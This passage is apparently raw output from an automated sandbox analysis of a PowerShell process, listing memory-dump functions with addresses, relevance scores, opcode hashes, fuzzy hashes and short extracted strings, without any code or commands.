                                                                                                                                                                                                    • Source File: 00000002.00000002.1572280184.00007FFB4B2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2B0000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ffb4b2b0000_powershell.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: e68b6221c1451d86d71b41b8bd6157c3a6e63f202e52cff894b52129472dc3ab
                                                                                                                                                                                                    • Instruction ID: ea29aec174ddc363ff516911d38b909f1e32fa5c05997978e6cc515a3a2c1316
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e68b6221c1451d86d71b41b8bd6157c3a6e63f202e52cff894b52129472dc3ab
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 63D137A290EB8A4FEBA6BF78C8555B97F91EF56300B0841FED54CC70A3DD18A809C351
                                                                                                                                                                                                    Function 00007FFB4B1E33B5 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000002.00000002.1571929190.00007FFB4B1E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B1E0000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ffb4b1e0000_powershell.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                                                                                                                    • Instruction ID: 01a61e6b6a5551b32f459001a20671f0395bf5775e0bea3da49b6cecf56e9795
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9201677111CB0C8FD748EF0CE451AA5B7E0FB95364F10056DE58AC3661DA36E882CB45

                                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                                    Function 00007FFB4B1E7876 Relevance: 32.9, Strings: 26, Instructions: 426COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000002.00000002.1571929190.00007FFB4B1E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B1E0000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ffb4b1e0000_powershell.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID: (AK$(AK$(AK$(AK$(AK$(AK$(AK$HAK$HAK$HAK$HAK$HAK$HAK$HAK$hAK$hAK$hAK$hAK$hAK$hAK$hAK$AK$AK$AK$AK$AK
                                                                                                                                                                                                    • API String ID: 0-2285349478
                                                                                                                                                                                                    • Opcode ID: bd6ebe75e8cf29a6bc317288110b962460b77d1f8485cbd3f763a9edd2a59e96
                                                                                                                                                                                                    • Instruction ID: f2d4a03ae062d4a8941b79bc1503bb1eb5d20c03c8c27778f0f676e6084b3bf7
                                                                                                                                                                                                    • Opcode Fuzzy Hash: bd6ebe75e8cf29a6bc317288110b962460b77d1f8485cbd3f763a9edd2a59e96
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 89B1FDC7E1DAC31BF33958ECBE052289ED1EBA56A470945FBE1C8861EF5C548E0687C1
                                                                                                                                                                                                    Function 00007FFB4B1E76B8 Relevance: 10.1, Strings: 8, Instructions: 120COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000002.00000002.1571929190.00007FFB4B1E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B1E0000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ffb4b1e0000_powershell.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID: (AK$(AK$HAK$HAK$hAK$hAK$AK$AK
                                                                                                                                                                                                    • API String ID: 0-3575954010
                                                                                                                                                                                                    • Opcode ID: ec804b34997e7727e864149312237667c4fa856062aef100f933d5ddccdf52f5
                                                                                                                                                                                                    • Instruction ID: 4c0bf1ffbe606377b1f36c52bf43cbe813afd630b616a8f05dea426c730774b3
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ec804b34997e7727e864149312237667c4fa856062aef100f933d5ddccdf52f5
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E2310CC7D0DEC21BF33959AC6A4D125DED2EBA55A475884BAE1C4470DFAC149E0583C1
                                                                                                                                                                                                    Function 00007FFB4B1E7BCE Relevance: 5.1, Strings: 4, Instructions: 63COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000002.00000002.1571929190.00007FFB4B1E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B1E0000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ffb4b1e0000_powershell.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID: (AK$HAK$hAK$AK
                                                                                                                                                                                                    • API String ID: 0-3183602359
                                                                                                                                                                                                    • Opcode ID: b6bfee1903fe1f6af4face5eff12563d42eabe5971d829bd9627633c3f3fce98
                                                                                                                                                                                                    • Instruction ID: 0f5939e2b9a653c1bf4774c7a6435b17ef8e576a670f87085414c5f2745f29cf
                                                                                                                                                                                                    • Opcode Fuzzy Hash: b6bfee1903fe1f6af4face5eff12563d42eabe5971d829bd9627633c3f3fce98
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3301E9C7A0E9D30BF33949ECBE092289FD1EBA41A570845F7E2C8870EF58149E0687C1
                                                                                                                                                                                                    Function 00007FFB4B1E77C6 Relevance: 5.0, Strings: 4, Instructions: 41COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000002.00000002.1571929190.00007FFB4B1E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B1E0000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ffb4b1e0000_powershell.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID: (AK$HAK$hAK$AK
                                                                                                                                                                                                    • API String ID: 0-3183602359
                                                                                                                                                                                                    • Opcode ID: 5a6dfa775dbf7b41504b106757107c3f6e4a79ae5e7e4b0994ea514327b0bcab
                                                                                                                                                                                                    • Instruction ID: e9400d21fb868c5b1777c10ca4801512685e2ba455e2e13c10f60d48879a702e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5a6dfa775dbf7b41504b106757107c3f6e4a79ae5e7e4b0994ea514327b0bcab
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5CF0F9C7E1E6C31BF32625A86E0B1288DD1FB6055076985B6E1C8471AF7C248E01C3C1
                                                                                                                                                                                                    Function 00007FFB4B1E5C27 Relevance: 5.0, Strings: 4, Instructions: 31COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000002.00000002.1571929190.00007FFB4B1E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B1E0000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ffb4b1e0000_powershell.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID: 0]AK$@]AK$P]AK$`]AK
                                                                                                                                                                                                    • API String ID: 0-1800155124
                                                                                                                                                                                                    • Opcode ID: a2547a0a688ac986d1ecac8694c76b44716b0c2c33ca688e06daa9e5b4ee6521
                                                                                                                                                                                                    • Instruction ID: 5aeed24520a2db8d507f1ebbe218b849f81a486a41e4a52cb687c5e1a3eefc0d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a2547a0a688ac986d1ecac8694c76b44716b0c2c33ca688e06daa9e5b4ee6521
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9DF05CD3E2D5861FE3789DACAE2C2780E92ABC0294399C0F3D2CF470EF98149A0517C1